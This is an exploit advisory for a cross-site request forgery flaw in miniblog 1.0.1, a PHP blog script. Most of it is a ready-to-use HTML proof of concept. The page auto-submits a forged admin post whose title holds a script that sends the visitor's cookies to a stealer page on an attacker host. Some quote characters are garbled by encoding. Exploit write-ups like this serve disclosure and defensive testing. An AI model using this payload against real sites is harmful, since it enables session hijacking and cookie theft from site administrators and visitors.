miniblog 1.0.1 Cross Site Request Forgery
Posted on 10 October 2016
# Exploit Title : miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post) # Author : Besim # Google Dork : # Date : 09/10/2016 # Type : webapps # Platform : PHP # Vendor Homepage : http://www.spyka.net/scripts/php/miniblog # Software link : http://dl.spyka.co.uk/scripts/php/miniblog-1-0-1.zip Description (admin login required) : miniblog 1.0.1 versions is vulnerable to CSRF attack, adding, delete and edit article in the sections Vulnerable page : http://localhost:8081/miniblog/*adm/admin.php?mode=add Dangerous point : if used with XSS can be steal on the admin's cookie information. *############### CSRF PoC ###############* <html> <!-- CSRF PoC --> <body> <form action=" http://localhost:8081/miniblog/adm/admin.php?mode=add&id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20post%20in%20%3Cb%3EC:xampphtdocsminiblogadmedit.php%3C/b%3E%20on%20line%20%3Cb%3E8%3C/b%3E%3Cbr%20/%3E" method="POST"> <input type="hidden" name="data[post_title]" value="<script>location.href = AC/€˜http://www.attackersite.com/stealer.php?cookie=AC/€™+document.cookie;</script>" /> <input type="hidden" name="data[post_content]" value="tester" /> <input type="hidden" name="data[published]" value="1" /> <input type="hidden" name="miniblog_PostBack" value="Add" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ########################################
